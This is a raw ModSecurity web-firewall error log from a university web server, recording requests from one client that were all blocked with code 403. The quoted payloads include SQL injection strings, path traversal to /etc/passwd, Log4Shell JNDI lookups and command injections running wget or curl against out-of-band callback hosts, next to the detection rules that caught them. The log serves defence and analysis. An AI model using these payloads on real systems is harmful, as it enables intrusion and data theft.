[Tue Aug 29 11:31:11.307315 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAPRNfkAAAAf"]
[Tue Aug 29 11:31:11.973655 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgnt8mqni9qc9jy.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAPPS1AAAAAd"]
[Tue Aug 29 11:31:13.310301 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAP6NMYAAAAQ"]
[Tue Aug 29 11:31:13.320834 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgxr7dpspxm5zwg.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQJWqsAAAAr"]
[Tue Aug 29 11:31:13.433115 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAQA-74AAAAi"]
[Tue Aug 29 11:31:14.327718 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQUH98AAAA2"]
[Tue Aug 29 11:31:14.352548 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQFcQYAAAAn"]
[Tue Aug 29 11:31:15.417139 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQFcQgAAAAn"]
[Tue Aug 29 11:31:16.756431 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAP@MxIAAAAZ"]
[Tue Aug 29 11:31:17.340198 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQIS74AAAAq"]
[Tue Aug 29 11:31:17.341316 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQEGG4AAAAm"]
[Tue Aug 29 11:31:17.348643 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAPahxcAAAAL"]
[Tue Aug 29 11:31:18.330467 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQFcQ0AAAAn"]
[Tue Aug 29 11:31:18.375552 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlgqmm1sgxbfhc1i.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAQDFSgAAAAl"]
[Tue Aug 29 11:31:20.339214 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAP8GzMAAAAV"]
[Tue Aug 29 11:31:22.469377 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "digilibfkip.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAPPS2IAAAAd"]
[Tue Aug 29 11:31:23.324830 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAP8GzgAAAAV"]
[Tue Aug 29 11:31:24.631759 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgowjkbxoi4r4kg.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQOv1UAAAAw"]
[Tue Aug 29 11:31:25.319698 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlge3t9fmgzamwtj.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAP@MyYAAAAZ"]
[Tue Aug 29 11:31:26.766214 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgmuaj9gwgkm697.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQFcSYAAAAn"]
[Tue Aug 29 11:31:27.405697 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAP@My8AAAAZ"]
[Tue Aug 29 11:31:28.443896 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10oMCo-f0AAAQR45gAAAAz"]
[Tue Aug 29 11:31:29.148501 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQFcSsAAAAn"]
[Tue Aug 29 11:31:29.402193 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQOv2MAAAAw"]
[Tue Aug 29 11:31:29.453481 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAQDFTkAAAAl"]
[Tue Aug 29 11:31:29.495237 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAPahzEAAAAL"]
[Tue Aug 29 11:31:30.316355 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQgqUMAAAAA"]
[Tue Aug 29 11:31:31.373811 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlghqbuuy4ogysrw.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQOv2wAAAAw"]
[Tue Aug 29 11:31:32.417951 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAPah0AAAAAL"]
[Tue Aug 29 11:31:33.556462 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] 